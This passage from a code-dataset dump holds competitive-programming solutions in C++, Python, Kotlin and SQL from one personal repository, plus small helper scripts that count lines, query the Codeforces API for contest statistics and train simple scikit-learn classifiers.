pii>> q;\n\tfori(edges[start].size())\n if (!used[edges[start][i]])\n q.insert({s[edges[start][i]], {start, edges[start][i]}}),\n debug ? ff() : writeln(\"added edge from\", start + 1, \"to\", edges[start][i] + 1);\n// stack<int> path;\n path.push(start);\n\twhile (!q.empty())\n\t{\n debug ? ff() : writeln(\"from\", (q.begin()->second).first + 1, \"to\", (q.begin()->second).second + 1);\n\t\tstart = (q.begin()->second).second;\n\t\tstring sadf = q.begin()->first;\n\t\tq.erase(q.begin());\n\t\tif (used[start])\n continue;\n if (!debug)\n qwre += \" \";\n qwre += sadf;\n\t\tused[start] = true;\n\t\tpath.push(start);\n fori(edges[start].size())\n if (!used[edges[start][i]])\n q.insert({s[edges[start][i]], {start, edges[start][i]}}),\n debug ? ff() : writeln(\"added edge from\", start + 1, \"to\", edges[start][i] + 1);\n debug ? ff() : writeln(\"start :\", start + 1);\n while (q.size() > 0 && used[(q.begin()->second).second])\n q.erase(q.begin());\n debug ? ff() : writeln(\"wanted :\", (q.begin()->second).second + 1);\n\t\twhile (path.size() > 0 && ((q.begin()->second).first != path.top()))\n\t\t{\n start = path.top();\n if (start == beg)\n goto fin;\n path.pop();\n debug ? ff() : writeln(\"to delete\", start + 1);\n fori(edges[start].size())\n q.erase({s[edges[start][i]], {start, edges[start][i]}});\n if (!ckech(path, used))\n qwre += dij(path, start);\n\t\t}\n // qwre += dij(path, start);\n\t}\n\tfin:\n//\twriteln(\"exited\");\n return qwre;\n}\n\nvoid solve()\n{\n used.clear();\n used.resize(n, false);\n int st = min_element(s.begin(), s.end()) - s.begin();\n stack<int> wert;\n ans = s[st] + dij(wert, st);\n}\n\nvoid run(bool d)\n{\n debug = !d;\n readInput();\n solve();\n writeOutput();\n}\n\nint main()\n{\n freopen(FILENAME\".in\", \"r\", stdin);\n freopen(FILENAME\".out\", \"w\", stdout);\n int T;\n readln(T);\n forn(q, T)\n printf(\"Case #%d: \", q + 1),\n run(q==-1);\n// q + 1 == 17 ? writeln(edges), writeln(s) : ff();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ngraph::graph(int n){this->n = n;edges.resize(n);int t;fori(n){edges[i].resize(n);forj(n)readln(t),edges[i][j] = t == '1';}}graph::graph(int n, int m){this->n = n;edges.resize(n);int u, v;fori(m)readln(u, v),add_edge(u - 1, v - 1);}void graph::add_edge(int u, int v){edges[u].pb(v);}void graph::add_or_edge(int u, int v){edges[u].pb(v);edges[v].pb(u);}graph::graph(){};void graph::createGraph(int n){edges.resize(n);}void graph::writeln(){fori(n)forj(edges[i].size())::writeln(i, edges[i][j]);}void graph::writelnMatrix(){::writeln(edges);}\nvoid print(double a){printf(\"%f \", a);}\nvoid print(int a){printf(\"%d \", a);}\nvoid print(string a){printf(\"%s \", a.c_str());}\nvoid print(long long a){printf(\"%lld \", a);}\nvoid print(unsigned long a){printf(\"%ld \", a);}\nvoid print(char a){printf(\"%c \", a);}\ntemplate<class Type>\nvoid print(vector<Type>& a){for(int i = 0; i < a.size(); ++i)print(a[i]);}\ntemplate<class Type>\nvoid print(vector<vector<Type>>& a){for(int i = 0; i < a.size(); ++i)writeln(a[i]);}\nvoid read(double &a){scanf(\"%lf\", &a);}\nvoid read(int &a){scanf(\"%d\", &a);}\nvoid read(string &a){cin>>a;}\nvoid read(long long &a){scanf(\"%lld\", &a);}\nvoid read(char &a){scanf(\"%c\", &a);}\ntemplate<class Type>\nvoid read(vector<Type> &a){if (a.size() == 0){int n; read(n); a.resize(n);}for(int i = 0; i < a.size(); ++i)read(a[i]);}\ntemplate<class Type>\nvoid read(vector<vector<Type>> &a){for(int i = 0; i < a.size(); ++i)readln(a[i]);}\ntemplate <class Head, class... Tail>\nvoid writeln(Head head, Tail... tail){print(head);writeln(tail...);}\ntemplate <class Head, class... Tail>\nvoid readln(Head& head, Tail&... tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.3860589861869812, "alphanum_fraction": 0.40482574701309204, "avg_line_length": 16.372093200683594, "blob_id": "be8f7fe7fe4eda2c1ea886807bf315ebca966eda", "content_id": "5cd626c5e35571ae669177421a5b85eb25253109", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 746, "license_type": "no_license", "max_line_length": 42, "num_lines": 43, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.11/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <vector>\n#include <iostream>\n#include <set>\n#define pb push_back\n \nusing namespace std;\n \n \nvoid run()\n{\n string s;\n int n;\n cin >> n;\n getline(cin, s);\n int a[26];\n for (int i = 0; i < 26; ++i)\n a[i] = 0;\n while(getline(cin, s))\n {\n int j = 0;\n while (s[j] == ' ')\n j++;\n a[s[j] - 'A'] = 1;\n }\n cout << \"Yes\\n\";\n string t = \"\";\n for (int i = 0; i < 26; ++i)\n if (a[i])\n t.pb(i + 'A'),\n t += \"| ~\",\n t.pb(i + 'A'),\n t.pb('|');\n cout << t.substr(0, t.size() - 1);\n}\n \nint main()\n{\n freopen(\"important.in\", \"r\", stdin);\n freopen(\"important.out\", \"w\", stdout);\n run();\n return 0;\n}" }, { "alpha_fraction": 0.4458598792552948, "alphanum_fraction": 0.46496814489364624, "avg_line_length": 18.625, "blob_id": "12d74a854e569b4fc2833440ecced87c433ffa80", "content_id": "234504d3caf0d3fcdbc382c3ba88e2ed55168a6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 157, "license_type": "no_license", "max_line_length": 52, "num_lines": 8, "path": "/scripts/lines.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "mask='*.lua'\na=0\nfor i in $mask; do\n b=$(cat \"$i\" | nl | tail -1 | awk '{print $1;}')\n echo $a $b $i\n a=$(python -c \"print ($a + $b)\")\ndone\necho $a\n" }, { "alpha_fraction": 0.42447417974472046, "alphanum_fraction": 0.4608030617237091, "avg_line_length": 19.115385055541992, "blob_id": "63750fe62c53e3dd020b27a0d67812ac321fd8af", "content_id": "eca8f83e311848b6dfe90582d6574f2227047de0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 523, "license_type": "no_license", "max_line_length": 51, "num_lines": 26, "path": "/CodeForce/0518/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//Igorjan94, template version from 16 February 2015\n#include <bits/stdc++.h>\n\nusing namespace std;\n#define count asasdaiusdyfoiuqwfd\nint count[300];\n\nint main()\n{\n string s, t;\n cin >> s >> t;\n for (char c : s)\n count[c]++;\n int ura = 0, zopa = 0;\n for (char& c : t)\n if (count[c])\n ura++,\n count[c]--,\n c = 0;\n for (char c : t)\n if (c && count[c ^ 32])\n zopa++,\n count[c ^ 32]--;\n cout << ura << \" \" << zopa;\n return 0;\n}\n" }, { "alpha_fraction": 0.467980295419693, "alphanum_fraction": 0.4926108419895172, "avg_line_length": 43.375, "blob_id": "7185a6aa9737e092ca239bd2d18e08a2a7f4138c", "content_id": "cdf442b4b54bfd8dd93a1b9dc9b86f7f62f4322a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1421, "license_type": "no_license", "max_line_length": 115, "num_lines": 32, "path": "/2022/yandexBackend/C.sql", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "CREATE FUNCTION inter(integer, integer, integer, integer, integer, integer, integer, integer)\nRETURNS boolean AS 'select sign($1*$4-$2*$3-$1*$6+$2*$5+$3*$6-$4*$5) != sign($1*$4-$2*$3-$1*$8+$2*$7+$3*$8-$4*$7)'\nLANGUAGE SQL\nIMMUTABLE\nRETURNS NULL ON NULL INPUT;\n\nselect id \n from Points\n where _X_LEFT_ <= \"x\" and \"x\" <= _X_RIGHT_ and _Y_BOTTOM_ <= \"y\" and \"y\" <= _Y_TOP_\nunion all\n\nselect id\n from Lines\n where \n (_X_LEFT_ <= \"begin_x\" and \"begin_x\" <= _X_RIGHT_ and _Y_BOTTOM_ <= \"begin_y\" and \"begin_y\" <= _Y_TOP_)\n or (_X_LEFT_ <= \"end_x\" and \"end_x\" <= _X_RIGHT_ and _Y_BOTTOM_ <= \"end_y\" and \"end_y\" <= _Y_TOP_)\n or inter(\"begin_x\", \"begin_y\", \"end_x\", \"end_y\", _X_LEFT_, _Y_BOTTOM_, _X_LEFT_, _Y_TOP_)\n or inter(\"begin_x\", \"begin_y\", \"end_x\", \"end_y\", _X_LEFT_, _Y_BOTTOM_, _X_RIGHT_, _Y_BOTTOM_)\n or inter(\"begin_x\", \"begin_y\", \"end_x\", \"end_y\", _X_RIGHT_, _Y_TOP_, _X_LEFT_, _Y_TOP_)\n or inter(\"begin_x\", \"begin_y\", \"end_x\", \"end_y\", _X_RIGHT_, _Y_TOP_, _X_RIGHT_, _Y_BOTTOM_);\n\nselect id \n from Points\n where 1 <= \"x\" and \"x\" <= 2 and 1 <= \"y\" and \"y\" <= 2\nunion all\n\nselect id\n from Lines\n where \n (1 <= \"begin_x\" and \"begin_x\" <= 2 and 1 <= \"begin_y\" and \"begin_y\" <= 2)\n or\n (1 <= \"end_x\" and \"end_x\" <= 2 and 1 <= \"end_y\" and \"end_y\" <= _Y_TOP)\n\n" }, { "alpha_fraction": 0.5483871102333069, "alphanum_fraction": 0.5657567977905273, "avg_line_length": 20.210525512695312, "blob_id": "f02883781164f8cdf3dd36f845b9bf0e6da39c25", "content_id": "3643a6e3bc003eed5a32c966107b014c99a0d597", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 403, "license_type": "no_license", "max_line_length": 46, "num_lines": 19, "path": "/scripts/tshirts.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"testlib.h\"\n#include <iostream>\n\nusing namespace std;\n\nint main(int argc, char *argv[]) {\n int seed = atoi(argv[1]);\n int len = atoi(argv[2]);\n int nwinners = 50;\n rnd.setSeed(seed);\n \n set<int> winners;\n while (winners.size() < nwinners)\n winners.insert(50 + rnd.next(1, len));\n \n for (auto winner: winners)\n cout << winner << \" \";\n cout << endl;\n}\n" }, { "alpha_fraction": 0.3449612259864807, "alphanum_fraction": 0.38372093439102173, "avg_line_length": 18.11111068725586, "blob_id": "fdc1ea0c4cb4e5060000f46fd286b1bc925f64a2", "content_id": "3072f9835651971a5c95b78be8c84293902333dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 516, "license_type": "no_license", "max_line_length": 42, "num_lines": 27, "path": "/2020/snws5/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\n\ncommands = ('( ' + input() + ' )').split()\nstack = [[]]\nadd = 0\nmod = 998244353\n\nfor c in commands:\n if c == '(':\n add += 1\n stack.append([])\n elif c == ')':\n add += 1\n x = stack.pop()\n temp = x[0]\n for i in range(1, len(x)):\n if add % 2 == 0:\n temp += x[i]\n else:\n temp *= x[i]\n temp %= mod\n stack[-1].append(temp)\n else:\n stack[-1].append(int(c))\n\n\nprint(stack[0][0])\n" }, { "alpha_fraction": 0.46875, "alphanum_fraction": 0.4861111044883728, "avg_line_length": 25.18181800842285, "blob_id": "efe86aeb91964c0cc6566d908b156e1ea457cb4e", "content_id": "ff0af57174072623c80a227de59e8611bb51263a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 288, "license_type": "no_license", "max_line_length": 76, "num_lines": 11, "path": "/2015/yaQual/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nl = [0] * n\nr = [0] * n\nc = [0] * n\nfor i in range(n):\n l[i], r[i] = map(int, input().split())\nm = int(input())\nfor i in list(map(int, input().split())):\n c[i - 1] += 1\nfor i in range(n):\n print(\"Red\" if c[i] > r[i] else (\"Orange\" if c[i] >= l[i] else \"Green\"))\n" }, { "alpha_fraction": 0.38297873735427856, "alphanum_fraction": 0.542553186416626, "avg_line_length": 46, "blob_id": "3aeb2333c173cd822f7dc44d90bcb29d56e50956", "content_id": "308868f2ea4b95791c3480c440cd1447898dec7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 56, "num_lines": 2, "path": "/2015/YaWarm/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "x1,y1,x2,y2=map(int,input().split())\nprint(str((y1+y2)*(y1+y2)+(x1-x2)*(x1-x2))+\".\"+(\"0\"*20))\n" }, { "alpha_fraction": 0.40086206793785095, "alphanum_fraction": 0.4267241358757019, "avg_line_length": 23.421052932739258, "blob_id": "82dcb15ff92917d8411f83ffc9d20c26d67f1368", "content_id": "e16cade0cd12ff33c3626327144a236e68f53307", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 464, "license_type": "no_license", "max_line_length": 74, "num_lines": 19, "path": "/CodeForce/gym/101095/X.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "m = int(input())\nmoney = list(map(int, input().split()))\n\nmx = 0\nlower = 500\nfor i in range(11):\n if money[i] <= m:\n for j in range(i + 1, 12):\n temp = (m // money[i]) * money[j] - (m // money[i]) * money[i]\n if temp > mx or temp == mx and lower > money[i]:\n mx = temp\n lower = money[i]\n I = i\n J = j\n\nif mx <= 0:\n print(\"IMPOSSIBLE\")\nelse:\n print(I + 1, J + 1, mx)\n" }, { "alpha_fraction": 0.6440443396568298, "alphanum_fraction": 0.6537396311759949, "avg_line_length": 38.02702713012695, "blob_id": "cf8269404abecfbb9f06854b9129880238069de9", "content_id": "dfb4c0240971c36df8ccb468a2d1c413b341e779", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2888, "license_type": "no_license", "max_line_length": 147, "num_lines": 74, "path": "/scripts/cf/plotSubmits.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append('/home/igorjan/206round/scripts')\n\nfrom library import *\n\ndef cf(method, **kwargs):\n params = dotdict(kwargs)\n req = requests.get('https://codeforces.com/api/' + method, params = params)\n ret = req.json()\n status = ret['status']\n if status != 'OK':\n comment = ret['comment']\n print(f'Error in {method} {status}: {comment}', kwargs)\n print(req.text)\n return None\n return ret\n\ndef getSubmits(contestId):\n def getter(**kwargs):\n return cf('contest.status', **kwargs)\n return unlimited(getter, 'result', 10000, True, count_field = 'count', offset_field = 'from', starting_offset = 1, contestId = contestId)\n\n\[email protected]()\[email protected]('contest_id', required=True, type=int, nargs=1)\[email protected]('-m', '--minutes', help='Stat for last <minutes>', default=20)\[email protected]('-u', '--unofficial', is_flag=True, help='Show only unofficial participants', default=False)\ndef plotContest(contest_id, minutes, unofficial):\n import matplotlib.pyplot as plt\n import matplotlib.dates as mdates\n contest = cf('contest.standings', **{'from': 1, 'contestId': contest_id, 'count': 1}).result.contest\n duration = contest.durationSeconds // 60\n title = contest.name\n submits = getSubmits(contest_id)\n\n def getDate(submit):\n return submit.relativeTimeSeconds / 60\n\n off = list(filter(lambda submit: submit.author.participantType == 'CONTESTANT', submits))\n unoff = list(filter(lambda submit: submit.author.participantType == 'OUT_OF_COMPETITION', submits))\n\n legend = []\n dates = []\n\n def getLast(submits, minutes):\n return len(list(filter(lambda d: d >= duration - minutes, submits))) * 100\n\n def add(submits, constestants):\n all_submits = list(map(getDate, filter(lambda submit: submit.verdict != 'OK', submits)))\n ok_submits = list(map(getDate, filter(lambda submit: submit.verdict == 'OK', submits)))\n dates.append(ok_submits)\n dates.append(all_submits)\n count_ok_last_minutes = getLast(ok_submits, minutes)\n count_all_last_minutes = getLast(all_submits, minutes)\n legend.append(f'{constestants} OK ({len(ok_submits)}), {count_ok_last_minutes / len(ok_submits):.0f}% in last {minutes} minutes')\n legend.append(f'{constestants} Incorrect ({len(all_submits)}), {count_all_last_minutes / len(all_submits):.0f}% in last {minutes} minutes')\n\n if unofficial:\n add(unoff, 'unofficial')\n else:\n add(off, 'official')\n\n fig, ax = plt.subplots(1, 1)\n ax.hist(dates, bins=duration, stacked=True)\n ax.legend(legend)\n # ax.xaxis.set_major_formatter(mdates.AutoDateFormatter())\n plt.xlabel('Time')\n plt.ylabel('Count of submits')\n plt.title(title)\n plt.savefig(title.replace(r'\\s', '') + '.png', dpi=900);\n # plt.show()\n\nif __name__ == \"__main__\":\n completion()\n" }, { "alpha_fraction": 0.5622236132621765, "alphanum_fraction": 0.5742261409759521, "avg_line_length": 32.680850982666016, "blob_id": "ba64de48f406c54a1cfede4f3ce7edf0ce04c80f", "content_id": "c288dd4cb1666468ff6a7170a50a5aa08c6dd80d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1583, "license_type": "no_license", "max_line_length": 125, "num_lines": 47, "path": "/scripts/cf/allContests.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append('/home/igorjan/206round/scripts')\n\nfrom library import *\nfrom plotSubmits import cf\nfrom bs4 import BeautifulSoup\nimport re\nfrom datetime import datetime\nimport time\nfrom collections import defaultdict\n\n\ndef main():\n contests = sys.argv[1:]\n participants = dotdict()\n for contestId in contests:\n print(contestId)\n contest = cf('contest.standings', contestId = contestId, **{'from': 1}, lang = 'en', showUnofficial = True)['result']\n for participant in contest['rows']:\n name = participant.party.members[0].handle\n t = participant.party.participantType\n rank = participant.rank\n points = participant.points\n if points <= 0:\n continue\n if name not in participants:\n participants[name] = dotdict(off = 0, unoff = 0, both = 0, place = 0)\n if t == 'CONTESTANT':\n participants[name].off += 1\n participants[name].both += 1\n participants[name].place += rank\n elif t == 'OUT_OF_COMPETITION':\n participants[name].unoff += 1\n participants[name].both += 1\n participants[name].place += rank\n time.sleep(2)\n\n items = participants.items()\n items = list(sorted(items, key = lambda x: [x[1].both, x[1].place]))\n print('name', 'cnt', '\\\\sigma_place', 'off', 'unoff')\n for k, v in items:\n if v.both >= len(contests):\n print(k, v.both, v.place, v.off, v.unoff)\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.3099173605442047, "alphanum_fraction": 0.3305785059928894, "avg_line_length": 39.33333206176758, "blob_id": "2983fe852fe9baefd1618f6bba40712abb754c13", "content_id": "5952f010670b401bdab6e212128aa31a7e5ce9fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 242, "license_type": "no_license", "max_line_length": 118, "num_lines": 6, "path": "/2014/RCC2014_1B/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "T = int(input())\nfor TT in range(T):\n n, m, p, q, t = map(int, input().split())\n k = n % (t / p)\n z = m % (t / q)\n print(1 + n / (t / p) + m / (t / q) - (k == 0) - (z == 0) + ((t / p, k)[k == 0] * p + (t / q, z)[z == 0] * q > t))\n" }, { "alpha_fraction": 0.4406779706478119, "alphanum_fraction": 0.508474588394165, "avg_line_length": 18.66666603088379, "blob_id": "2144d4d8a9dba4516a865b8f779f0088cdba1568", "content_id": "2ec2f7d35ce782e5de0d860f8169d713b088d6e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 33, "num_lines": 3, "path": "/CodeForce/1645/gen.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 2 * 10 ** 5\nprint(n)\nprint(*[n - i for i in range(n)])\n" }, { "alpha_fraction": 0.445328027009964, "alphanum_fraction": 0.47514909505844116, "avg_line_length": 21.863636016845703, "blob_id": "ea41d190a17eb09e7f2811af606d4829237d4a53", "content_id": "3351291c13fa9665d6818cfc7a966cd27788c5f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 503, "license_type": "no_license", "max_line_length": 50, "num_lines": 22, "path": "/2017/newYear/H.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*\n\nval random = Random()\nfun rand(from: Int, to: Int) : Int {\n return random.nextInt(to - from) + from\n}\n\nfun main(args: Array<String>) {\n val s = Scanner(System.`in`)\n val ans = mutableListOf<Int>()\n with(s) {\n val n = nextInt()\n for (i in 1 .. n) {\n if (n <= 30) {\n ans.add(1 shl i)\n } else {\n ans.add(rand(0, 1000000000))\n }\n }\n println(ans.joinToString(separator = \" \"))\n }\n}\n" }, { "alpha_fraction": 0.5793103575706482, "alphanum_fraction": 0.5957559943199158, "avg_line_length": 24.445945739746094, "blob_id": "c9e37aabad4a4980fd9ead6a2c3b852680fa649e", "content_id": "a5935503d0c20175987be8211ed49a344a09908f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1885, "license_type": "no_license", "max_line_length": 64, "num_lines": 74, "path": "/2021/vkcupMl/train.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\nimport csv\nfrom tqdm import tqdm\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import make_pipeline\nfrom joblib import dump, load\n\n\ntrainFile = './TRAIN/trainSmall.csv'\ntestFile = './TRAIN/testSmall.csv'\n\nfriends = {}\ntrain = {}\nX = []\ny = []\n\ndef addFriends(u, v, t):\n if not u in friends:\n friends[u] = {}\n friends[u][v] = t\n\nprint('Reading friends')\n\nwith open(trainFile, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n for row in tqdm(reader):\n u = int(row['u'])\n v = int(row['v'])\n t = [int(row['t']), int(row['h'])]\n addFriends(u, v, t)\n addFriends(v, u, t)\n # if len(friends) > 300000:\n # break\n\n# friendsCount = []\n# for u, fs in friends.items():\n # friendsCount.append([len(fs), u])\n# friendsCount.sort(reverse = True)\n# print(friendsCount[:1000])\n\nprint('Reading answers')\n\nwith open(testFile, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n for row in tqdm(reader):\n u = int(row['u'])\n v = int(row['v'])\n if not u in train:\n train[u] = set()\n train[u].add(v)\n\nprint('Getting X and y')\n\nfor w, wsFriends in tqdm(friends.items(), total = len(friends)):\n l = len(wsFriends)\n for u, uw in wsFriends.items():\n if u % 8 != 1: continue\n if (100 - uw[0]) * uw[1] / l < 0.25: continue\n for v, vw in wsFriends.items():\n if v % 2 == 0 or v <= u or v in friends[u]: continue\n if (100 - vw[0]) * vw[1] / l < 0.25: continue\n X.append([l, *uw, *uw])\n y.append(u in train and v in train[u])\n\nprint('Predictions done')\n\nclf = make_pipeline(StandardScaler(), DecisionTreeClassifier())\nclf.fit(X, y)\ndump(clf, 'filename.joblib2')\n\nprint('Classifier saved')\n\n\n" }, { "alpha_fraction": 0.3179680109024048, "alphanum_fraction": 0.3433678150177002, "avg_line_length": 20.714284896850586, "blob_id": "c4d255c77b7aa0bd04b8b63b85c852f559d803f2", "content_id": "4babe5006872aa39185cdec7b911d7d270db1503", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1063, "license_type": "no_license", "max_line_length": 74, "num_lines": 49, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.11/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <vector>\n#include <iostream>\n \nusing namespace std;\n \nint matrix[300][300];\n \nvoid run()\n{\n int n, r, c;\n cin >> n >> r >> c;\n matrix[0][0] = 1;\n //n--;\n int ans = 1, u = n / 2, rc = 0;\n for (int i = 1; i <= u; ++i){\n if (ans + 2 > n)\n break;\n if (i >= min(r, c))\n break;\n matrix[i][0] = 1;\n matrix[0][i] = 1;\n ans += 2;\n rc++;\n // cout << ans << \" \" << n << \" \" << i << \" \" << min(r, c) << endl;\n }\n // n++;\n cout << rc + 1<< endl;\n for (int i = 0; i < r; ++i)\n for (int j = 0; j < c; ++j){\n // cout << i << \" \" << j << \" \" << ans << endl;\n if (matrix[i][j] == 0 && ans < n){\n matrix[i][j] = 1;\n ans++;\n }\n }\n \n for (int i = 0; i < r; i++, cout << \"\\n\")\n for (int j = 0; j < c; ++j)\n cout << (matrix[i][j] ? '#' : '.');\n}\n \nint main()\n{\n freopen(\"class.in\", \"r\", stdin);\n freopen(\"class.out\", \"w\", stdout);\n run();\n return 0;\n}" }, { "alpha_fraction": 0.38461539149284363, "alphanum_fraction": 0.4871794879436493, "avg_line_length": 18.5, "blob_id": "849c1a5e4bb32bcc85c8c7bb492a95e76337dfbb", "content_id": "277d220cfa6dfaace82333c2f7bed759dc0bb09c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 21, "num_lines": 2, "path": "/CodeForce/gym/396147/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nprint(n * 9 / 5 + 32)\n" }, { "alpha_fraction": 0.43302181363105774, "alphanum_fraction": 0.4704049825668335, "avg_line_length": 20.399999618530273, "blob_id": "e088a410681b8d1e6958f70de5d38058e503220b", "content_id": "8e4a7c9cc3d77e188f135a845c5a102f468ed249", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 321, "license_type": "no_license", "max_line_length": 44, "num_lines": 15, "path": "/CodeForce/0552/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "w, m = map(int, input().split())\nmass = []\nwhile m > 0:\n mass.append(m % w)\n m //= w\nmass.append(0)\nfor i in range(len(mass) - 1):\n if mass[i] >= w - 1:\n mass[i + 1] += 1\n mass[i] = 0\nok = 1\nfor i in range(len(mass)):\n if mass[i] > 1:\n ok = 0\nprint(\"NO\" if ok == 0 and w != 2 else \"YES\")\n" }, { "alpha_fraction": 0.458984375, "alphanum_fraction": 0.47265625, "avg_line_length": 20.29166603088379, "blob_id": "1b09c45bebde7d4447db482405bcc8f32441093e", "content_id": "f70a11850714ce94fae865f0aa66060e347c3fd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "no_license", "max_line_length": 61, "num_lines": 24, "path": "/2023/tin/6.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "# python 3.10\n\n\ndef compress_sequence(text: str) -> list[tuple[int, int]]:\n i = 0\n a = list(map(int, text.split(', ')))\n n = len(a)\n ans = []\n while i < n:\n j = i\n c = 0\n while j < n and a[i] == a[j]:\n j += 1\n c += 1\n\n ans.append((a[i], c))\n i = j\n return ans\n\n\nif __name__ == \"__main__\":\n input_str = input()\n # Необходимо преобразовать список в строку перед выводом.\n print(', '.join(map(str, compress_sequence(input_str))))\n\n" }, { "alpha_fraction": 0.6547278165817261, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 28.08333396911621, "blob_id": "6dfad88b3b43fd457de64e8928f55362c3a9ffb2", "content_id": "3b9951c544417406392bd972fe7c5e8dd61d842c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2094, "license_type": "no_license", "max_line_length": 77, "num_lines": 72, "path": "/Ann/moons/train.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "from sklearn import svm\nimport sys\nimport random\n\n#initializing\ntrain = []\nanswer = []\ntesting = []\n\n#reading input and parsing\nfor line in open('train.csv', 'r'):\n temp = list(map(float, line.split(',')))\n train.append(temp[:-1])\n answer.append(temp[-1])\nfor line in open('test.csv', 'r'):\n testing.append(list(map(float, line.split(','))))\n\n#checking how efficiently works one method. return percent of correct answers\ndef training(train, test, answerTrain, answerTest):\n print(clf)\n clf.fit(train, answerTrain)\n correct = 0\n x = clf.predict(test)\n n = len(test)\n for i in range(n):\n if answerTest[i] == x[i]:\n correct += 1\n return correct / n\n\n#unless we had test with answers, do it\n#dividing training set on 5 partitions : 4 fisrt -- training, 5th -- test\nn = len(train)\nk = n // 5\ntest = train[-k:]\ntrain = train[:-k]\nanswerTest = answer[-k:]\nanswerTrain = answer[:-k]\n\n#try different kernels and parametres, choose with max percent\nclf = svm.SVC()\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='linear')\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='sigmoid')\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='sigmoid', gamma=2)\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='sigmoid', gamma=2, coef0=2)\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='poly')\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='poly',degree=2)\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='poly',degree=1, coef0=1)\nprint(training(train, test, answerTrain, answerTest))\n\n#the best one, polynomial kernel: (gamma <x, x'> + coef0) ^ degree,\n#degree = 3, coef0 = 3, gamma = 0.0 => gamma = 1/n_features\nclf = svm.SVC(kernel='poly', coef0=3)\nprint(training(train, test, answerTrain, answerTest))\n\n#output the answer\na = open('output.txt', 'w')\nfor i in clf.predict(testing):\n a.write(str(int(i)) + \"\\n\")\n" }, { "alpha_fraction": 0.3540229797363281, "alphanum_fraction": 0.3724137842655182, "avg_line_length": 9.875, "blob_id": "d804d69ba32fa08fa426156bd17363c69ed2e1f1", "content_id": "516433fb070641b63f9c2d77333ed0a40a78a878", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 435, "license_type": "no_license", "max_line_length": 87, "num_lines": 40, "path": "/trash/cp/main.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\nusing namespace std;\n\nstruct A\n{\n int id = 1000;\n int get()\n {\n return 1;\n 